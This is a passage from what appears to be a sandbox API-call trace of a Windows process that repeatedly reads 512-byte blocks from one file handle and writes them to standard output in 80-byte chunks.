lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] GetFileType (hFile=0x50) returned 0x1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] GetFileType (hFile=0x50) returned 0x1 [0152.495] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.495] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] GetFileType (hFile=0x50) returned 0x1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.496] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.497] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.497] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] GetFileType (hFile=0x50) returned 0x1 [0152.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.497] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] GetFileType (hFile=0x50) returned 0x1 [0152.498] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.498] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.498] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.498] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.499] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.499] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.499] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.500] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.500] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.500] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] GetFileType (hFile=0x50) returned 0x1 [0152.501] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.501] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.502] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.502] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.503] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.503] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.505] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.505] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.506] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.506] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 